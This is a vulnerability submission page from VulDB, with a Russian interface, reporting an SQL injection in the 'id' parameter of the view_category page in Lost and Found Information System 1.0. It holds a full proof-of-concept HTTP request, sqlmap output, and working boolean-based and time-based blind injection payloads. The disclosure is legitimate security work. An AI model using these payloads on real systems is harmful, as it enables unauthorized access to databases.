Отправить #155230: SQL Injection in view category function in Lost and Found Information SystemИнформация

НазваниеSQL Injection in view category function in Lost and Found Information System
ОписаниеSQL Injection in view category function in Lost and Found Information System 1.0 parameter: id Producion: Lost and Found Information System Version: 1.0 PoC: Request: GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/php-lfis/admin/?page=categories Connection: close Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Run request with sqlmap and output: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb ---
Источник⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Пользователь
 huutuanbg97 (UID 45015)
Представление11.05.2023 17:32 (3 лет назад)
Модерация12.05.2023 08:01 (14 hours later)
Статуспринято
Запись VulDB228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category ИД SQL-инъекция]
Баллы20

ПредыдущийОбзорДалее

Might our Artificial Intelligence support you?

Check our Alexa App!